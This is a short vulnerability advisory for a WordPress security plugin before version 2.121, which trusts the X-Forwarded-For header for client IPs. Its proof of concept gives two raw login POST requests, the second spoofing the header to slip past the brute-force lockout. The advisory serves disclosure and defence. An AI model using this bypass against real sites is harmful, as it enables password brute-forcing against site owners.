Security & Malware scan by CleanTalk < 2.121 - IP Spoofing

Description This plugin retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to bypass bruteforce protection.

PoC

Send 5 invalid login requests and thus block the IP address. POST /wp-login.php HTTP/1.1 Host: localhost Content-Length: 97 Content-Type: application/x-www-form-urlencoded Cookie: wp-settings-time-2=1692902176; betterlinks_visitor=bl64ece171d4145; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dupload%26cats%3Dpop; wp-settings-time-1=1695178741 Connection: close log=admin&pwd;=test&wp-submit;=Log+In&redirect;_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie;=1 Send login request with X-Forwarded header and spoofed IP address. POST /wp-login.php HTTP/1.1 Host: localhost Content-Length: 97 Content-Type: application/x-www-form-urlencoded Cookie: wp-settings-time-2=1692902176; betterlinks_visitor=bl64ece171d4145; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dupload%26cats%3Dpop; wp-settings-time-1=1695178741 Connection: close X-Forwarded-For: 8.8.8.8 log=admin&pwd;=test&wp-submit;=Log+In&redirect;_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie;=1 Check the logs by visiting /wp-admin/options-general.php?page=spbc&spbc;_tab=security_log.